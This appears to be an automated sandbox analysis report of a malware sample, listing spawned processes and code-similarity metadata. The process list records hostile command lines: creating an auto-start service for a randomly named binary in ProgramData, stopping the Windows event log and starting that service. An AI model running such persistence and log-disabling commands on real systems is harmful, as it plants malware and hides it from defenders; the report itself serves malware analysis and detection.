                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:62
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:63
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:64
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:65
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:66
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:67
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:68
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                      Wow64 process (32bit):false
                      Commandline:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                      Imagebase:0x7ff613710000
                      File size:5'471'744 bytes
                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 74%, ReversingLabs
                      Has exited:true

                      Target ID:69
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:70
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:71
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:72
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:73
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\lsass.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\lsass.exe
                      Imagebase:0x7ff6b5fa0000
                      File size:59'456 bytes
                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:74
                      Start time:10:09:21
                      Start date:07/01/2025
                      Path:C:\Windows\System32\svchost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      Imagebase:0x7ff67e6d0000
                      File size:55'320 bytes
                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:75
                      Start time:10:09:21
                      Start date:07/01/2025
                      Path:C:\Windows\System32\dwm.exe
                      Wow64 process (32bit):false
                      Commandline:"dwm.exe"
                      Imagebase:0x7ff7751a0000
                      File size:94'720 bytes
                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false


                        Execution Graph

                        Execution Coverage:80.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:7.1%
                        Total number of Nodes:28
                        Total number of Limit Nodes:1

                        Callgraph

                        Callgraph (rendered graph omitted): Function_004014D1 -> Function_0040145B; Function_0040145B -> Function_00401410, Function_004013B4, Function_0040108C; Function_0040108C -> Function_00401000

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                        • String ID:
                        • API String ID: 3649950142-0
                        • Opcode ID: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                        • Instruction ID: 276d267c830fb1744484ad8078350a7426bd4a7cdf1eb4e40a6b3a9487509305
                        • Opcode Fuzzy Hash: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                        • Instruction Fuzzy Hash: 2B11ECF5A00204AFCB00EBA9DC55F4A73ECE748304F144475F909F7361E579E9888B65

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                        • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$t!@
                        • API String ID: 3236948872-2690058073
                        • Opcode ID: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
                        • Instruction ID: 915970d7f8feda4f52418ac8c3b3d67a18a16e2b2df1165333ea2636041f6ec6
                        • Opcode Fuzzy Hash: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
                        • Instruction Fuzzy Hash: 888101F1E001149BDB54DBACDC45B9E77A9EB48309F040579F109FB392E63DAE448B68

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): basic blocks 401000-40102e (calls malloc), 401031-401039, 40103f-401085, 401087-40108b; edges 401000->401031, 401031->401087, 401031->40103f, 40103f->401031 (loop)
                        APIs
                        Strings
                        • />pj)w^wi!p&370^jskbtm-=lzrjeh2*, xrefs: 0040106E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: malloc
                        • String ID: />pj)w^wi!p&370^jskbtm-=lzrjeh2*
                        • API String ID: 2803490479-4076278676
                        • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                        • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                        • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                        • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): single basic block 40145b-4014ae, calling 4013b4, 40108c and 401410
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: memset$ExecuteShellstrcmp
                        • String ID: D`GuD`Gu$D`GuD`Gu
                        • API String ID: 1389483452-1111891142
                        • Opcode ID: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                        • Instruction ID: 76c1b6daecc4063cf20948b66e9e7b3ce613b504874fb2aeec9fcfb98b4de26b
                        • Opcode Fuzzy Hash: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                        • Instruction Fuzzy Hash: 9AF09E75A00208AFCB40EFADD981D8A77F8AB4C304F1044A5FD48E7351D674E9848B55

                        Execution Graph

                        Execution Coverage:6.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        Execution graph (rendered graph omitted): 8bc6428 -> 8bc646b (SetThreadToken) -> 8bc6499

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): basic blocks 4f1b570-4f1b599, 4f1b59b, 4f1b59e-4f1b8d9 (calls 4f1ab94), 4f1b8de-4f1b8e5; edges 4f1b570->4f1b59b, 4f1b570->4f1b59e, 4f1b59b->4f1b59e, 4f1b59e->4f1b8de
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 626a5f55ebbe8238e348b47c970b43b91c5ba74aff668c14bd5493da4cbab1ba
                        • Instruction ID: bb96f4cf23a9cbc8b969b0349678b2a282b93fb8bf3b0a0f8c18952b29693795
                        • Opcode Fuzzy Hash: 626a5f55ebbe8238e348b47c970b43b91c5ba74aff668c14bd5493da4cbab1ba
                        • Instruction Fuzzy Hash: 53918E70F007559BEB15EFB498505AEBBB3EFC4601B00892DD506AB384EF35AE068BD5

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): basic blocks 4f1b580-4f1b599, 4f1b59b, 4f1b59e-4f1b8d9 (calls 4f1ab94), 4f1b8de-4f1b8e5; edges 4f1b580->4f1b59b, 4f1b580->4f1b59e, 4f1b59b->4f1b59e, 4f1b59e->4f1b8de
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b718c3843d6ee08bbad53823964e1f2343781b45c114e6d6aaa5693318afc311
                        • Instruction ID: 8548e76f4f156acde09300fd8fff964cd9b72bf61a279260393539dfdc0983f1
                        • Opcode Fuzzy Hash: b718c3843d6ee08bbad53823964e1f2343781b45c114e6d6aaa5693318afc311
                        • Instruction Fuzzy Hash: 8B918E70F00715DBEB19EFB498515AEBBA3EFC4601B00892CD506AB384EF356E068BD5
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1489129914.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7a50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: pi\k$pi\k$pi\k$pi\k$pi\k$|,^k
                        • API String ID: 0-2199735641
                        • Opcode ID: 3500beef21e8a663d90226b977a69ee69440b8cd842730383f5a3fa754273788
                        • Instruction ID: f4d33aa8d8642a38e767344c039df952d98540729d0022b7ecb4c18fd178964c
                        • Opcode Fuzzy Hash: 3500beef21e8a663d90226b977a69ee69440b8cd842730383f5a3fa754273788
                        • Instruction Fuzzy Hash: E622E4F1B00306DFDB24DF6884407AABBE5FFC9221F04806ADD259B691DB35D951CBA2

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): basic blocks 8bc6420-8bc6463, 8bc646b-8bc6497 (SetThreadToken), 8bc6499-8bc649f, 8bc64a0-8bc64bd; edges 8bc6420->8bc646b, 8bc646b->8bc6499, 8bc646b->8bc64a0, 8bc6499->8bc64a0
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.1493947059.0000000008BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_8bc0000_powershell.jbxd
                        Similarity
                        • API ID: ThreadToken
                        • String ID:
                        • API String ID: 3254676861-0
                        • Opcode ID: 3d75088cbd5ebb718520be6ca9ad8b4a0ac69a69cfcae4537596649178e1e3e6
                        • Instruction ID: a9952ffd60a469ad4606eda5cdc2c27f85ea2e75734bbd81fa296cef717dfc5d
                        • Opcode Fuzzy Hash: 3d75088cbd5ebb718520be6ca9ad8b4a0ac69a69cfcae4537596649178e1e3e6
                        • Instruction Fuzzy Hash: 731146759003498FDB10DFAAC484B9EFFF8EB89224F14845DD158A3210C774A844CFA0

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): basic blocks 8bc6428-8bc6497 (SetThreadToken), 8bc6499-8bc649f, 8bc64a0-8bc64bd; edges 8bc6428->8bc6499, 8bc6428->8bc64a0, 8bc6499->8bc64a0
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.1493947059.0000000008BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_8bc0000_powershell.jbxd
                        Similarity
                        • API ID: ThreadToken
                        • String ID:
                        • API String ID: 3254676861-0
                        • Opcode ID: 6e4d62ec6c8a185c689eccbfeae36cbd8243488d62c32127153059227bf1b080
                        • Instruction ID: 1cf4b03f671f200e31d64b3fb5e577d5f114eb6cdeeb8af42442d2c06fc944a8
                        • Opcode Fuzzy Hash: 6e4d62ec6c8a185c689eccbfeae36cbd8243488d62c32127153059227bf1b080
                        • Instruction Fuzzy Hash: D51133B59003098FDB10DF9AC884B9EFBF8EB88724F24841ED418A3310C778A944CFA4
                        Memory Dump Source
                        • Source File: 00000002.00000002.1489129914.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7a50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d820d86ef19b1ee5ab118070c8c927b102b342b7e62f8efa34f0208a55e13104
                        • Instruction ID: ef685f9d1b77bba5fadf0dae2a63ebee2a18664dd7b4f0076b8cba41ce7de0f2
                        • Opcode Fuzzy Hash: d820d86ef19b1ee5ab118070c8c927b102b342b7e62f8efa34f0208a55e13104
                        • Instruction Fuzzy Hash: 4D1289B17043559FDB159F6898007AABBB2AFCA254F24C47ADD25CF291CB31CC81C7A1

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): function entered at 4f129f0, basic blocks spanning 4f129f0-4f12c67, no API calls annotated
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0094a8d4e89ec03b81ab06033601d7d4bb40f9973c61b62eeee4befa0243847
                        • Instruction ID: 07756b46aa0fe8d16d66b9affeb5a1899ac3ac2dc78883bae5f2f20e0f3ec43d
                        • Opcode Fuzzy Hash: a0094a8d4e89ec03b81ab06033601d7d4bb40f9973c61b62eeee4befa0243847
                        • Instruction Fuzzy Hash: 39917C74A002058FCB19CF99C4D4AAEFBB1FF88310B258599D955AB365C735FC52CBA0

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): function entered at 4f1bba0, basic blocks spanning 4f1bba0-4f1bdb6, calls 4f1b088 and 4f1a870
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc022e90c537bc5841e23c5292bef59b27fc70484bc5c996f6ebd20843c001f2
                        • Instruction ID: 7a3932bca9a1e119e1750c999d7be87f052fc6f8e7d18efd17ae5239841c4cc4
                        • Opcode Fuzzy Hash: fc022e90c537bc5841e23c5292bef59b27fc70484bc5c996f6ebd20843c001f2
                        • Instruction Fuzzy Hash: 2D613971E00248DFDB15CFA9D484A8DFBF1FF88310F15816AE809AB365EB34A846CB50

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted): function entered at 4f1bbb0, basic blocks spanning 4f1bbb0-4f1bdb6, calls 4f1b088 and 4f1a870
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 696605e60e65604f8e86a151ea53702872808b9acc12dcb05f21b1b74ea401f6
                        • Instruction ID: acb86804b31970de780ca7780c14ee8b3fa70a2097ef611bea565a62ddfd5f1c
                        • Opcode Fuzzy Hash: 696605e60e65604f8e86a151ea53702872808b9acc12dcb05f21b1b74ea401f6
                        • Instruction Fuzzy Hash: 6161F471E00249DFDB14DFA9D584B9DFBF1EF98310F15812AE808AB264EB74AD46CB50
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81aa2210c6e4454628eaa13610cada2dbe76294fa18da0338088b2ecba38931a
                        • Instruction ID: 8fd61e7e9ed8461316521b34e91f13571666211e6ce3ea3f5f2261bc5af50967
                        • Opcode Fuzzy Hash: 81aa2210c6e4454628eaa13610cada2dbe76294fa18da0338088b2ecba38931a
                        • Instruction Fuzzy Hash: C2519E317042049FD708AB69D854B6A77EAFFC9265F248469E50ECB365EB35EC02CB90
                        Memory Dump Source
                        • Source File: 00000002.00000002.1489129914.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7a50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c844647a0213b6e9990b26895fc59c2431bccd000fee1927c4e788e120c651dc
                        • Instruction ID: 6e74601715f16537fe653a008c7f0197fc343f3ea4da77744f7dfdbda79ff5dd
                        • Opcode Fuzzy Hash: c844647a0213b6e9990b26895fc59c2431bccd000fee1927c4e788e120c651dc
                        • Instruction Fuzzy Hash: CE4103F1A11202DBDF268F64C550A7ABBF39FC6288F1884A5DD219F291C731DC48CBA1
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f21ccf0b0f00c7bc59c34f8331bf90e4a6b0428d1ab59412aa4325c12437752e
                        • Instruction ID: f814d00372f8a3e836de215a3eb4eb1315973b818f8924c06d056892cacf4130
                        • Opcode Fuzzy Hash: f21ccf0b0f00c7bc59c34f8331bf90e4a6b0428d1ab59412aa4325c12437752e
                        • Instruction Fuzzy Hash: C2411B34B042048FDB14EF69C454AADBBF2EF8D711F244499E806AB3A1DB35AC42CB60
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7b8b4fb90559b25db13dbef0d4b92438bcb29f75d756191996a47456e3870ff
                        • Instruction ID: 9e64a3ac63dec87f514bfc0663d95ba4b1ff5234f45a0c90ed4a35c98de273c9
                        • Opcode Fuzzy Hash: c7b8b4fb90559b25db13dbef0d4b92438bcb29f75d756191996a47456e3870ff
                        • Instruction Fuzzy Hash: 93411774A006059FCB09CF99C5D8AAAF7B1FF88310B128599D915AB364C736FC52CFA4
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b41505d0afc47a404883d3cdfcd8bb060eb1878a580f772992e3bb15333c761
                        • Instruction ID: 629b00271f8b479d90e3f9bb4538cd4c5011c4e2c236fb114feb1774223b38ad
                        • Opcode Fuzzy Hash: 8b41505d0afc47a404883d3cdfcd8bb060eb1878a580f772992e3bb15333c761
                        • Instruction Fuzzy Hash: A2414F34B082458FCB15DF68C894AADBBF1AF8E314F185099D805FB362DB35AC42CB60
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f701f38458948a0a9f18e44f6704bcb92c9ecf122eb4c6c9be54e8afc13cae5
                        • Instruction ID: 2648637b87a7a5a14b848c971e8a93d0331050ed421a771cbb402b89e5ce6a7d
                        • Opcode Fuzzy Hash: 4f701f38458948a0a9f18e44f6704bcb92c9ecf122eb4c6c9be54e8afc13cae5
                        • Instruction Fuzzy Hash: 4D417F35B00200CFDB10DF68D458AADBBF6EF89315F158569D80AEB3A1DB34AC82CB50
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f841b15c9c87e30ca6cd04b5c696fced3cf41a64933ef3bf0e7165c496299955
                        • Instruction ID: 29f4e16c460641b5cc40efde82fb6c7b7fc83dacb74c9fc8d3716b65c3a85e4f
                        • Opcode Fuzzy Hash: f841b15c9c87e30ca6cd04b5c696fced3cf41a64933ef3bf0e7165c496299955
                        • Instruction Fuzzy Hash: F831C0313002418FE705EB38E840B9AB792FFC4216F008229D50ACB365DF71A812CBA1
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fae4bdd184b8413d87eca8ccdc69041063276709a41a936c06575a61ef888c7c
                        • Instruction ID: 4e2158f2d201b83fc14083d1bc7acc932978a72c1c1094137f7fdc6a5f2bd4a3
                        • Opcode Fuzzy Hash: fae4bdd184b8413d87eca8ccdc69041063276709a41a936c06575a61ef888c7c
                        • Instruction Fuzzy Hash: C4314970E012099FDB05DFA9D494BAEBBF6EF88310F158029E505EB364EB74AC428B51
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • Instruction ID: c354ac5094f6d6889446e46633e61dcc02a0c459ed5a524b8cbbc60d3bbb459e
                        • Opcode Fuzzy Hash: a19fe3e245a973c4151a468f4c7e18a106ee0a53e12656b007031491ccb6894c
                        • Instruction Fuzzy Hash: D2D05E5270122107AA5439FA5D20ABBB1CF8AE64E5B06023A9E08D7351EC84EC0343F1
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                        • Instruction ID: ffb392e4f3789144f91ae8ad236cc5103aa36832694683de00d61828268f3cbc
                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                        • Instruction Fuzzy Hash: 89E08632B04014A78B08D599D4504D9F7BADBCC221F04847FD90AA7350DA72791687D1
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
